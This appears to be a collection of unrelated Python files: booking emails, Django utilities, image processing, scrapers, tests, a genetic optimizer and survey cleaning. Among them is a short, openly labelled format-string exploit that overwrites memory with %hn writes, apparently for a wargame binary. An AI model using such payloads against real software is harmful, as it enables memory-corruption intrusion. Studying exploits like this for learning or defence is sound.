mytemplate = Template(filename=report_parameters.report_txt)
self.paid = self.booking.paid_amt != Decimal(0.00)
body = mytemplate.render(
today_date=today_date, conf=self,
logo_code=report_parameters.logo_code,
deposit_icon=report_parameters.deposit_icon,
deluxe_logo_code=report_parameters.deluxe_logo_code,
deposit_url=self.deposit_url
)
return body
def generate_confirmation(self, report_parameters, action):
if not self.booking:
log.error('Missing booking')
return
log.debug(
f'Generating confirmation for booking {self.booking.no}, '
f'action = {action}'
)
if self.skip:
log.warning(f'Skipping booking {self.booking.no}')
return
self.prepare(report_parameters)
log.info(
f'Booking {self.booking.no} titled {self.title}.'
f' Action: {action}')
body = self.confirmation_body(report_parameters)
body_txt = self.confirmation_body(report_parameters, body_format='txt')
now = datetime.now()
timestamp = now.strftime("%Y%m%d%H%M%S")
text_file_name = f"{self.booking.no}_{timestamp}.txt"
fout = path.join(self.env.confirmations_folder, text_file_name)
f = open(fout, 'w')
f.write(body_txt)
f.close()
file_name = f"{self.booking.no}_{timestamp}.html"
fout = path.join(self.env.confirmations_folder, file_name)
f = open(fout, 'w')
f.write(body)
f.close()
send_email = False
if action == 'email':
send_email = True
if action == 'display' or action == 'review':
webbrowser.open_new_tab(fout)
if action == 'review':
response = input("Email message [Y/N]? ")
send_email = (response.lower()[0] == 'y')
if send_email:
if self.booking.customer.email == '':
log.warning(
f'Customer {self.booking.customer.no} '
f'({self.booking.customer.surname})'
f' has no email address [bk_no={self.booking.no}]'
)
else:
if self.forced_subject:
subject = self.forced_subject
else:
subject = f'{self.title} #{self.booking.no}'
self.env.send_email(
self.booking.customer.email, body,
subject, body_txt
)
try:
if not self.deposit:
self.deposit_amount = 0.0
handle_confirmation(
self.env, self.booking.no, self.deposit_amount,
subject, file_name, self.conf_no,
self.booking.customer.email
)
except Exception as e:
log.exception(str(e))
log.debug('Confirmation complete')
return (file_name, text_file_name)
|
from django.core.management.base import BaseCommand, CommandError
from ncdjango.models import Service, Variable, SERVICE_DATA_ROOT
from django.db import transaction
import os
import os.path
class Command(BaseCommand):
help = 'Delete an ncdjango service'
def add_arguments(self, parser):
parser.add_argument('service_name')
def handle(self, *args, **options):
name = options['service_name']
with transaction.atomic():
svc = Service.objects.get(name=name)
Variable.objects.filter(service_id=svc.id).delete()
path = svc.data_path
svc.delete()
os.remove(os.path.join(SERVICE_DATA_ROOT, path))
|
import os
from shutil import copyfile
import socket
from setuptools import setup, find_packages, Command
from distutils.command.install import install
from distutils.command.sdist import sdist
here = os.path.dirname(os.path.abspath(__file__))
class InstallCommand(install):
user_options = install.user_options
def initialize_options(self):
install.initialize_options(self)
def finalize_options(self):
install.finalize_options(self)
def run(self):
install.run(self)
setup(
name="sqlalchemy-gpudb",
version="7.0.1",
author="Andrew Duberstein",
author_email="ksutton@kinetica.com",
description="Kinetica dialect for SQLAlchemy",
license="MIT",
classifiers=[
"License :: OSI Approved :: Apache Software License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
keywords="SQLAlchemy GPUDb",
cmdclass={
"install": InstallCommand,
"sdist": sdist,
},
extras_require={
"dev": [
"pytest",
"black",
]
},
packages=find_packages(include=["sa_gpudb"]),
include_package_data=True,
install_requires=["SQLAlchemy", "pyodbc"],
)
|
# Generated by Django 3.0.3 on 2020-08-06 15:50
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0063_auto_20200804_1403'),
]
operations = [
migrations.AlterModelTable(
name='salessubmissioncontent',
table='sales_submission_content',
),
]
|
import discord
from discord.ext import commands
import os
from dotenv import load_dotenv
import json
import sys, traceback
#configs
load_dotenv("./config/.env")
TOKEN = os.getenv("token")
PREFIX = os.getenv("prefix")
bot = commands.Bot(command_prefix=f'{PREFIX}')
bot.remove_command('help')
@bot.event
async def on_ready():
await bot.change_presence(
status=discord.Status.idle,
activity=discord.Activity(type=discord.ActivityType.watching, name=f"{PREFIX}help")
)
print("Bot online!")
with open ('extension/module.json', 'r') as data:
cog_data = json.load(data)
extension = cog_data['imports']
if __name__ == "__main__":
for modules in extension:
try:
bot.load_extension(modules)
print(f"[/] loaded | {modules}")
except:
print(f'Error loading {modules}', file=sys.stderr)
traceback.print_exc()
bot.run(f"{TOKEN}")
|
#Exploit code by RegaledSeer
import sys
ADDRESS = "\xf4\x96\x04\x08"
SECOND_ADDRESS = "\xf6\x96\x04\x08"
DUMMY_STRING = "AAAA"
DUMMY_STRING_TWO = "BBBB"
FIRST_WRITE = 0x5544
SECOND_WRITE = 0x10102
def find_exploit():
payload = ""
payload += DUMMY_STRING
payload += DUMMY_STRING_TWO
payload += "%12$p"
payload += "%13$p"
return payload
def craft_exploit():
payload = ""
payload += ADDRESS
payload += SECOND_ADDRESS
payload += "%{0}x".format(FIRST_WRITE - (len(ADDRESS) + len(SECOND_ADDRESS)))
payload += "%12$hn"
payload += "%{0}x".format(SECOND_WRITE - FIRST_WRITE)
payload += "%13$hn"
return payload
def main():
sys.stdout.write(craft_exploit())
if __name__ == "__main__":
main()
|
"""
Some functionality related to dataset
Copyright (C) 2016-2018 Jiri Borovec <jiri.borovec@fel.cvut.cz>
"""
import os
import logging
import numpy as np
import cv2 as cv
import matplotlib.pyplot as plt
from skimage.filters import threshold_otsu
from skimage.exposure import rescale_intensity
TISSUE_CONTENT = 0.01
def detect_binary_blocks(vec_bin):
""" detect the binary object by beginning, end and length in !d signal
:param [bool] vec_bin: binary vector with 1 for an object
:return [int], [int], [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> detect_binary_blocks(vec)
([0, 20], [15, 39], [14, 19])
"""
begins, ends, lengths = [], [], []
# in case that it starts with an object
if vec_bin[0]:
begins.append(0)
length = 0
# iterate over whole array, skip the first one
for i in range(1, len(vec_bin)):
if vec_bin[i] > vec_bin[i - 1]:
begins.append(i)
elif vec_bin[i] < vec_bin[i - 1]:
ends.append(i)
lengths.append(length)
length = 0
elif vec_bin[i] == 1:
length += 1
# in case that it ends with an object
if vec_bin[-1]:
ends.append(len(vec_bin) - 1)
lengths.append(length)
return begins, ends, lengths
def find_split_objects(hist, nb_objects=2, threshold=TISSUE_CONTENT):
""" find the N largest objects and set split as middle distance among them
:param [float] hist: input vector
:param int nb_objects: number of desired objects
:param float threshold: threshold for input vector
:return [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> find_split_objects(vec)
[17]
"""
hist_bin = hist > threshold
begins, ends, lengths = detect_binary_blocks(hist_bin)
if len(lengths) < nb_objects:
logging.error('not enough objects')
return []
# select only the number of largest objects
obj_sorted = sorted(zip(lengths, range(len(lengths))), reverse=True)
obj_select = sorted([o[1] for o in obj_sorted][:nb_objects])
# compute the mean in the gup
splits = [np.mean((ends[obj_select[i]], begins[obj_select[i + 1]]))
for i in range(len(obj_select) - 1)]
splits = list(map(int, splits))
return splits
def find_largest_object(hist, threshold=TISSUE_CONTENT):
""" find the largest objects and give its beginning end end
:param [float] hist: input vector
:param float threshold: threshold for input vector
:return [int]:
>>> vec = np.array([1] * 15 + [0] * 5 + [1] * 20)
>>> find_largest_object(vec)
(20, 39)
"""
hist_bin = hist > threshold
begins, ends, lengths = detect_binary_blocks(hist_bin)
assert len(lengths) > 0, 'no object found'
# select only the number of largest objects
obj_sorted = sorted(zip(lengths, range(len(lengths))), reverse=True)
obj_select = obj_sorted[0][1]
return begins[obj_select], ends[obj_select]
def project_object_edge(img, dimension):
""" scale the image, binarise with Othu and project to one dimension
:param ndarray img:
:param int dimension: select dimension for projection
:return [float]:
>>> img = np.zeros((20, 10, 3))
>>> img[2:6, 1:7, :] = 1
>>> img[10:17, 4:6, :] = 1
>>> project_object_edge(img, 0).tolist() # doctest: +NORMALIZE_WHITESPACE
[0.0, 0.0, 0.7, 0.7, 0.7, 0.7, 0.0, 0.0, 0.0, 0.0,
0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.0, 0.0, 0.0]
"""
assert dimension in (0, 1), 'not supported dimension %i' % dimension
assert img.ndim == 3, 'unsupported image shape %s' % repr(img.shape)
img_gray = np.mean(img, axis=-1)
img_gray = cv.GaussianBlur(img_gray, (5, 5), 0)
p_low, p_high = np.percentile(img_gray, (1, 95))
img_gray = rescale_intensity(img_gray, in_range=(p_low, p_high))
img_bin = img_gray > threshold_otsu(img_gray)
img_edge = np.mean(img_bin, axis=1 - dimension)
return img_edge
def load_large_image(img_path):
""" loading very large images
Note, for the loading we have to use matplotlib while ImageMagic nor other
lib (opencv, skimage, Pillow) is able to load larger images then 64k or 32k.
:param str img_path: path to the image
:return ndarray: image
"""
assert os.path.isfile(img_path), 'missing image: %s' % img_path
img = plt.imread(img_path)
if img.ndim == 3 and img.shape[2] == 4:
img = cv.cvtColor(img, cv.COLOR_RGBA2RGB)
return img
def save_large_image(img_path, img):
""" saving large images more then 50k x 50k
Note, for the saving we have to use openCV while other
lib (matplotlib, Pillow, ITK) is not able to save larger images then 32k.
:param str img_path: path to the new image
:param ndarray img: image
>>> img = np.random.random((2500, 3200, 3))
>>> img_path = './sample-image.jpg'
>>> save_large_image(img_path, img)
>>> img2 = load_large_image(img_path)
>>> img.shape == img2.shape
True
>>> os.remove(img_path)
"""
if img.ndim == 3 and img.shape[2] == 4:
img = cv.cvtColor(img, cv.COLOR_RGBA2RGB)
# for some reasons with linear interpolation some the range overflow (0, 1)
if np.max(img) <= 1.5:
img = (img * 255)
elif np.max(img) > 255:
img = (img / 255.)
if img.dtype != np.uint8:
img = np.clip(img, a_min=0, a_max=255).astype(np.uint8)
if os.path.isfile(img_path):
logging.debug('image will be overwritten: %s', img_path)
cv.imwrite(img_path, img)
|
# -*- coding: utf-8 -*-
import yaml
import os
import numpy as np
import pprint
from core.utils import decode_name
def _decode_yaml_tuple(tuple_str):
return np.array(list(map(lambda x: list(map(int, str.split(x, ','))), tuple_str.split())))
def decode_cfg(path):
print('Loading config from', path)
if not os.path.exists(path):
raise KeyError('%s does not exist ... ' % path)
with open(path, 'r') as f:
cfg = yaml.safe_load(f.read())
# some fields need to be decoded
cfg['yolo']['strides'] = list(map(int, cfg['yolo']['strides'].split(',')))
cfg['yolo']['mask'] = _decode_yaml_tuple(cfg['yolo']['mask'])
cfg['yolo']['anchors'] = _decode_yaml_tuple(cfg['yolo']['anchors'])
cfg['yolo']['names'] = decode_name(cfg['yolo']['name_path'])
cfg['yolo']['num_classes'] = len(cfg['yolo']['names'])
cfg['train']['image_size'] = list(map(int, cfg['train']['image_size'].split(',')))
cfg['test']['image_size'] = list(map(int, cfg['test']['image_size'].split(',')))
pprint.pprint(cfg)
return cfg
|
from unittest.mock import patch
import pytest
import harvey.app as app
@pytest.mark.parametrize(
'route',
[
'health',
'pipelines',
# 'pipelines/<pipeline_id>', # TODO: Figure out how to test endpoints with parameters
],
)
def test_routes_are_reachable_get(mock_client, route):
response = mock_client.get(route)
assert response.status_code == 200
def test_routes_not_found(mock_client):
response = mock_client.get('bad_route')
assert response.status_code == 404
@patch('harvey.webhooks.Webhook.parse_webhook')
def test_start_pipeline(mock_parse_webhook):
# TODO: Long-term, test the status_code and logic
app.start_pipeline()
mock_parse_webhook.assert_called_once()
|
import scrapy
from oslusiadasextract.utils import Utils
from oslusiadasextract.dbconnections.mongo_connection import MongoConnection
utils = Utils()
mongo_connection = MongoConnection()
class SpiderlusiadasSpider(scrapy.Spider):
name = 'spiderlusiadas'
start_urls = utils.generate_chants_links()
def parse(self, response):
array_with_text = response.xpath('//div[@class="uk-panel uk-panel-box estrofe"]/descendant::text()').extract()
current_url = response.request.url
chant_info = utils.parse_chant_url(current_url)
chant_text = ' '.join(utils.parse_scrapy_response(array_with_text)).strip()
print(chant_info['chant_number'])
print(chant_info['stranza'])
print(chant_text)
mongo_connection.insert_chant({"chant_number": chant_info['chant_number'],
"stranza": chant_info['stranza'],
"text": chant_text})
pass
|
from bs4 import BeautifulSoup
import requests
from PIL import Image
from io import BytesIO
import os
def Start():
search=input("Search :")
params={"q":search}
dir_name=search.replace(" ","_").lower()
if not os.path.isdir(dir_name):
os.makedirs(dir_name)
r=requests.get("https://www.bing.com/images/search",params=params)
soup=BeautifulSoup(r.text,"html.parser")
links=soup.findAll("a",{"class":"thumb"})
for item in links:
img_obj=requests.get(item.attrs["href"])
print("Downloading",item.attrs["href"])
title=item.attrs["href"].split("/")[-1]
try:
img=Image.open(BytesIO(img_obj.content))
img.save("./"+dir_name+"/"+title,img.format)
except:
print("Cannot save this file format")
Start()
Start()
|
# pylint: skip-file
import ast
import inspect
import pathlib
import asttokens
# import black
def ForeignKey(
to,
on_delete,
related_name=None,
related_query_name=None,
limit_choices_to=None,
parent_link=False,
to_field=None,
db_constraint=True,
**kwargs,
):
pass
sig = inspect.signature(ForeignKey)
def walk(parent):
for path in parent.iterdir():
if path.is_dir():
yield from walk(path)
elif path.suffix == ".py":
yield path
def get_replacements(tree):
visitor = Visitor(tree)
visitor.visit(tree.tree)
return visitor.replacements
def replace(src, replacements):
chunks = []
end = len(src)
for (start, stop), mod in reversed(replacements):
chunks.append(src[stop:end])
chunks.append(mod)
end = start
chunks.append(src[0:end])
return "".join(reversed(chunks))
class Visitor(ast.NodeVisitor):
def __init__(self, tree):
self.tree = tree
self.replacements = []
def visit_Call(self, node):
self.generic_visit(node)
if not isinstance(node.func, ast.Attribute):
return
if node.func.attr not in ("ForeignKey", "OneToOneField"):
return
args = node.args
kwargs = {k.arg: k.value for k in node.keywords}
bound_args = sig.bind_partial(*args, **kwargs)
if "on_delete" in bound_args.arguments:
return
src = (
self.tree.get_text(node)[:-1].rstrip().rstrip(",")
+ ", on_delete=models.CASCADE)"
)
self.replacements.append((self.tree.get_text_range(node), src))
for path in walk(pathlib.Path(".")):
src = path.read_text()
try:
tree = asttokens.ASTTokens(src, filename=path, parse=True)
except SyntaxError:
print(f"Cannot parse {path}")
continue
replacements = get_replacements(tree)
if not replacements:
continue
print(f"Modifying {len(replacements)} calls in {path}")
src = replace(src, replacements)
# src = black.format_str(src, line_length=79)
path.write_text(src)
|
from warnings import warn
import pandas as pd
import matplotlib.lines as mlines
from ..utils import make_iterable, SIZE_FACTOR, order_as_mapping_data
from ..exceptions import PlotnineWarning
from ..doctools import document
from ..aes import aes
from .geom import geom
from .geom_segment import geom_segment
@document
class geom_vline(geom):
"""
Vertical line
{usage}
Parameters
----------
{common_parameters}
"""
DEFAULT_AES = {'color': 'black', 'linetype': 'solid',
'size': 0.5, 'alpha': 1}
REQUIRED_AES = {'xintercept'}
DEFAULT_PARAMS = {'stat': 'identity', 'position': 'identity',
'na_rm': False, 'inherit_aes': False}
def __init__(self, mapping=None, data=None, **kwargs):
mapping, data = order_as_mapping_data(mapping, data)
xintercept = kwargs.pop('xintercept', None)
if xintercept is not None:
if mapping:
warn("The 'xintercept' parameter has overridden "
"the aes() mapping.", PlotnineWarning)
data = pd.DataFrame({'xintercept': make_iterable(xintercept)})
mapping = aes(xintercept='xintercept')
kwargs['show_legend'] = False
geom.__init__(self, mapping, data, **kwargs)
def draw_panel(self, data, panel_params, coord, ax, **params):
"""
Plot all groups
"""
ranges = coord.backtransform_range(panel_params)
data['x'] = data['xintercept']
data['xend'] = data['xintercept']
data['y'] = ranges.y[0]
data['yend'] = ranges.y[1]
data = data.drop_duplicates()
for _, gdata in data.groupby('group'):
gdata.reset_index(inplace=True)
geom_segment.draw_group(gdata, panel_params,
coord, ax, **params)
@staticmethod
def draw_legend(data, da, lyr):
"""
Draw a vertical line in the box
Parameters
----------
data : dataframe
da : DrawingArea
lyr : layer
Returns
-------
out : DrawingArea
"""
x = [0.5 * da.width] * 2
y = [0, da.height]
data['size'] *= SIZE_FACTOR
key = mlines.Line2D(x,
y,
alpha=data['alpha'],
linestyle=data['linetype'],
linewidth=data['size'],
color=data['color'],
solid_capstyle='butt',
antialiased=False)
da.add_artist(key)
return da
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""Msticpy MSAL authentication test class."""
from unittest.mock import patch
from msticpy.common.msal_auth import MSALDelegatedAuth
class MSALAppMock:
"""Mock the MSAL PublicClientApplicaiton for tests"""
def __init__(self):
self.authed = False
def get_accounts(self, **kwargs):
if kwargs["username"] and kwargs["username"] == "test@test.com" or self.authed:
return ["test@test.com"]
else:
return None
def acquire_token_silent_with_error(self, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def acquire_token_interactive(self, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def acquire_token_by_device_flow(self, flow, **kwargs):
self.authed = True
return {
"access_token": "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
}
def initiate_device_flow(self, **kwargs):
return {"message": "Your Device Code is ABCDEF", "user_code": "ABCDEF"}
@patch("msal.PublicClientApplication")
def test_msal_auth_device(msal_mock):
"""Test MSAL auth with a Device Code."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test.com",
scopes=["User.Read"],
auth_type="device",
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
@patch("msal.PublicClientApplication")
def test_msal_auth(msal_mock):
"""Test MSAL auth with Interactive Authentication."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test.com",
scopes=["User.Read"],
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
@patch("msal.PublicClientApplication")
def test_msal_auth_unkown_user(msal_mock):
"""Test MSAL auth with Interactive Authentication with an unkown user."""
msal_mock.return_value = MSALAppMock()
auth = MSALDelegatedAuth(
client_id="461d2b50-8c8a-4ac4-b78c-6110144d93ce",
authority="https://login.microsoftonline.com",
username="test@test2.com",
scopes=["User.Read"],
)
auth.get_token()
assert auth.token == "aHR0cHM6Ly9yZWFkdGhlZG9jcy5vcmcvcHJvamVjdHMvbXN0aWNweS8="
|
# Databricks notebook source
# COMMAND ----------
stats_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
# COMMAND ----------
downloaded_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/downloaded.parquet")
# COMMAND ----------
downloaded_df.distinct().count()
# COMMAND ----------
# Collect the relevant data
df_width_height = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
df_resolutions = df_width_height.where(df_width_height.img_width.isNotNull()).where(df_width_height.img_height.isNotNull())
df_resolutions.count()
# COMMAND ----------
downloaded_df.count()
# COMMAND ----------
downloaded_df.join().groupBy("error_code").count().show()
# COMMAND ----------
df = df_resolutions.join(downloaded_df.select(downloaded_df.image_id.alias("id")), "id", "leftanti")
# COMMAND ----------
df.show()
# COMMAND ----------
labels_df = spark.read.parquet("/mnt/group07/final_data_product/classification_result/labels.parquet")
# COMMAND ----------
labels_df.select("image_id").distinct().count()
# COMMAND ----------
# Get Total Amount Of Bytes Downloaded / S3 Access
stats_df.select("img_size").groupBy().sum().show()
# COMMAND ----------
import pyspark.sql.functions as pf
import pandas as pd
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
# Collect the relevant data
df_width_height = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet")
df_resolutions = df_width_height.where(df_width_height.img_width.isNotNull()).where(df_width_height.img_height.isNotNull())
df_resolutions.join(df, "id", "left_anti").select("img_size", "img_width", "img_height").describe().show()
# COMMAND ----------
import numpy as np
import matplotlib.pyplot as plt
def autolabel(rects):
"""
Attach a text label above each bar displaying its height
"""
for rect in rects:
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2., 1.01*height,
'%d' % int(height),
ha='center', va='bottom')
plt.close("all")
count_list = spark.read.parquet("/mnt/group07/final_data_product/classification_result/stats.parquet").select("error_code").groupBy("error_code").count().collect()
labels, values = zip(*count_list)
fig, ax = plt.subplots(figsize=(7,6))
xs = np.arange(len(labels))
width = 1
labels = ["Invalid\nImage" if val == "image file is truncated (32 bytes not processed)" else "HTTP\n{0}".format(val) if val != "s3" else "S3\nGET" for val in labels]
rects = plt.bar(xs, values, width, align='center')
plt.xticks(xs, labels, rotation='vertical')
plt.yticks(values)
plt.ylabel("Number Of Requests")
autolabel(rects)
display(fig)
fig.savefig("/dbfs/mnt/group07/plots/initial_downloads.pdf")
# COMMAND ----------
|
import random, sys, time
import numpy as np
from .tournament import TeamTournament
class Optimizer(object):
"""docstring for Optimizer"""
#Population stats
pop_size = 60
runs = 1
elitism = True
#The mutation rate, in percent
mutation_rate = 3
def __init__(self):
super(Optimizer, self).__init__()
def mutate_population(self, population):
"""
A mutation funtion that mutates the individuals.
"""
for individual in population:
for position,trait in enumerate(individual):
if random.randint(0,100) < self.mutation_rate:
individual[position] += np.random.normal()
def reproduce(self, scores, population, elitism=False):
"""
Reproduces a population
"""
if elitism:
scores[np.argmax(scores)] *= 2
#Clip the scores to 0
np.clip(scores, 0, sys.maxint, scores)
#print(np.average(scores))
#print(scores)
#Normalize scores
total_score = sum(scores)
scores /= total_score
choices = np.random.choice(
range(population.shape[0]),
(len(population), 2),
p=scores
)
new_pop = np.zeros(population.shape)
for index, parents in enumerate(choices):
new_pop[index, :] = self.cross_over(map(lambda x:population[x], parents))
return new_pop
def cross_over(self, parents):
"""
Crosses over parents to produce a child
"""
assert(len(parents[0]) == len(parents[0]))
num_traits = len(parents[0])
index = random.randint(int(num_traits/5),int(4*num_traits/5))
child = np.zeros(parents[0].shape)
child[:index] = (parents[0])[:index]
child[index:] = (parents[1])[index:]
return child
def run(self, players, teams, pop_size, gen_max, **kwargs):
assert(len(players) > 0)
assert(len(players) == teams[0] * teams[1])
num_features = players[0].param_dim()
#Create the tournament object
tourney = TeamTournament(teams)
# Create the populations
populations = np.zeros((teams[0], pop_size, num_features))
for t in range(teams[0]):
for p in range(teams[1]):
populations[t,p,:] = players[t*teams[1] + p].get_params()
for run in range(self.runs):
#get the start time
start_time = time.time()
for gen_count in range(gen_max):
scores = tourney.play_tournament(populations, players)
print("\nGen: {}".format(gen_count))
for team, population in enumerate(populations):
new_population = self.reproduce(scores[team,:], population)
self.mutate_population(new_population)
populations[team,:,:] = new_population
|
# -*- coding: utf-8 -*-
import csv, json
import os
import traceback
import settings
import tools
diverse_matcher = {
"Very Diverse": 3, "Moderately Diverse": 2,
"Slightly Diverse": 1, "Not Diverse": 0
}
importance_matcher = {
"Very Important": 3,
"Moderately Important": 2,
"Slightly Important": 1,
"Slightly Unimportant": -1, #contains special ascii character
"Moderately Unimportant": -2,
"Very Unimporant": -3
}
agreement_matcher = {
"Strongly Agree": 3,
"Moderately Agree": 2,
"Slightly Agree": 1,
"Slightly Disagree": -1,
"Moderately Disagree": -2,
"Strongly Disagree": -3
}
def clean_fac_staff_data(fac_staff_data):
fac_staff_clean_key = []
fac_staff_clean_data = []
# strip initial entry that is the question each answer coorelates to
for i in xrange(1, len(fac_staff_data)):
try:
print('.'),
raw_entry = fac_staff_data[i]
clean_entry = []
# ignore timestamp
# position
position_matcher = {"Staff": "staff",
"Non-Tenured Faculty": "nontenured faculty",
"Tenured Faculty": "tenured faculty"}
position = position_matcher[raw_entry[1]]
clean_entry.append(('position', raw_entry[1], position))
# race
race_matcher = {"African American / Black": "black",
"Asian": "asian", "Hispanic / Latino / Latina": "hispanic",
"Non-Hispanic White": "white",
"Pacific Islander / Hawaiian" : "hawaiian", "Not Listed": "not listed"
}
race = race_matcher[raw_entry[2]]
clean_entry.append(('race', raw_entry[2], race))
# bio gender
bio_gender_matcher = {"Female": "female", "Male": "male"}
bio_gender = bio_gender_matcher[raw_entry[3]]
clean_entry.append(('bio_gender', raw_entry[3], bio_gender))
# id gender
id_gender_matcher = {"Man": "male", "Woman": "female",
"Intersexual": "intersexual", "Transgender": "transgender",
"Not Listed": "not listed"}
id_gender = id_gender_matcher[raw_entry[4]]
clean_entry.append(('id_gender', raw_entry[4], id_gender))
# sexuality
sexuality_matcher = {"Asexual": "asexual", "Bisexual": "bisexual",
"Gay": "gay", "Heterosexual": "heterosexual", "Lesbian": "lesbian",
"Questioning": "questioning", "Not Listed": "not listed"
}
sexuality = sexuality_matcher[raw_entry[5]]
clean_entry.append(('sexuality', raw_entry[5], sexuality))
# years at E&H
years_working_matcher = {"1st year": 1, "2-5": 3.5, "6-10": 8,
"11-19": 15, "20+": 25
}
years_working = years_working_matcher[raw_entry[6]]
clean_entry.append(('years_working', raw_entry[6], years_working))
# division
division_matcher = {"Humanities": "humanities",
"Life Sciences": "life sciences",
"Social Sciences": "social sciences", "": None
}
division = division_matcher[raw_entry[7]]
clean_entry.append(('division', raw_entry[7], division))
# student body diversity perception
student_body_diversity_perception = diverse_matcher[raw_entry[8]]
clean_entry.append(("student_body_diversity_perception", raw_entry[8],
student_body_diversity_perception))
# student faculty staff diversity perception
student_fac_staff_diversity_perception = diverse_matcher[raw_entry[9]]
clean_entry.append(('student_fac_staff_diversity_perception', raw_entry[9],
student_fac_staff_diversity_perception))
# diversity importance
diversity_importance = importance_matcher[raw_entry[10]]
clean_entry.append(('diversity_importance', raw_entry[10], diversity_importance))
# experience loop
categories = (
'diversity_emphesis', 'race_experience', 'financial_experience',
'religion_experience', 'gender_experience', 'sexuality_experience',
'safe_in_buildings', 'safe_walking', 'asking_me_for_help',
'help_availability', 'student_of_diff_race_seek_help',
'greek_life_discriminiation', 'non_greek_life_discriminiation',
'athletics_discrimination', 'non_athletics_discrimination',
'prc_access'
)
number = 11
for cat in categories:
raw_val = raw_entry[number]
clean_val = agreement_matcher[raw_val]
clean_entry.append((cat, raw_val, clean_val))
number += 1
fac_staff_clean_data.append(clean_entry)
except Exception as e:
print("\nProcessing failed for entry {}".format(i))
traceback.print_exc()
raise(e)
return fac_staff_clean_data
def main():
print("Loading fac_staff raw csv.")
fac_staff_data = []
with open(settings.fac_staff_raw_path, 'r') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
fac_staff_data.append(row)
fac_staff_clean_data = clean_fac_staff_data(fac_staff_data)
print('\nFinished processing {} fac_staff responses.'.format(len(fac_staff_clean_data)))
# tools.print_first(3, fac_staff_clean_data)
# deleting old clean data
if os.path.exists(settings.fac_staff_clean_path):
print("Deleting old clean data.")
os.remove(settings.fac_staff_clean_path)
else:
print("No old clean data to delete.")
print("Writing data to: {}".format(settings.fac_staff_clean_path))
try:
with open(settings.fac_staff_clean_path, "w") as f:
f.write(json.dumps(fac_staff_clean_data))
except Exception as e:
print("Failed to write clean fac_staff data!")
raise e
if __name__ == "__main__":
print("Starting clean_data.py\n")
main()
print("\nExiting clean_data.py")
|
from osgeo import gdal
import math
import matplotlib.pyplot as plt
import numpy as np
import os
from osgeo import gdal_array
import pandas as pd
import uuid
import warnings
from .pipesegment import PipeSegment, LoadSegment, MergeSegment
class Image:
def __init__(self, data, name='image', metadata={}):
self.name = name
self.metadata = metadata
self.set_data(data)
def set_data(self, data):
if isinstance(data, np.ndarray) and data.ndim == 2:
data = np.expand_dims(data, axis=0)
self.data = data
def __str__(self):
if self.data.ndim < 3:
raise Exception('! Image data has too few dimensions.')
metastring = str(self.metadata)
if len(metastring)>400:
metastring = metastring[:360] + '...'
return '%s: %d bands, %dx%d, %s, %s' % (self.name,
*np.shape(self.data),
str(self.data.dtype),
metastring)
class Identity(PipeSegment):
"""
This class is an alias for the PipeSegment base class to emphasize
its role as the identity element.
"""
pass
class LoadImageFromDisk(LoadSegment):
"""
Load an image from the file system using GDAL, so it can be fed
into subsequent PipeSegments.
"""
def __init__(self, pathstring, name=None, verbose=False):
super().__init__()
self.pathstring = pathstring
self.name = name
self.verbose = verbose
def load(self):
return self.load_from_disk(self.pathstring, self.name, self.verbose)
def load_from_disk(self, pathstring, name=None, verbose=False):
# Use GDAL to open image file
dataset = gdal.Open(pathstring)
if dataset is None:
raise Exception('! Image file ' + pathstring + ' not found.')
data = dataset.ReadAsArray()
if data.ndim == 2:
data = np.expand_dims(data, axis=0)
metadata = {
'geotransform': dataset.GetGeoTransform(),
'projection_ref': dataset.GetProjectionRef(),
'gcps': dataset.GetGCPs(),
'gcp_projection': dataset.GetGCPProjection(),
'meta': dataset.GetMetadata()
}
metadata['band_meta'] = [dataset.GetRasterBand(band).GetMetadata()
for band in range(1, dataset.RasterCount+1)]
if name is None:
name = os.path.splitext(os.path.split(pathstring)[1])[0]
dataset = None
# Create an Image-class object, and return it
imageobj = Image(data, name, metadata)
if verbose:
print(imageobj)
return imageobj
class LoadImageFromMemory(LoadSegment):
"""
Points to an 'Image'-class image so it can be fed
into subsequent PipeSegments.
"""
def __init__(self, imageobj, name=None, verbose=False):
super().__init__()
self.imageobj = imageobj
self.name = name
self.verbose = verbose
def load(self):
return self.load_from_memory(self.imageobj, self.name, self.verbose)
def load_from_memory(self, imageobj, name=None, verbose=False):
if type(imageobj) is not Image:
raise Exception('! Invalid input type in LoadImageFromMemory.')
if name is not None:
imageobj.name = name
if verbose:
print(imageobj)
return(imageobj)
class LoadImage(LoadImageFromDisk, LoadImageFromMemory):
"""
Makes an image available to subsequent PipeSegments, whether the image
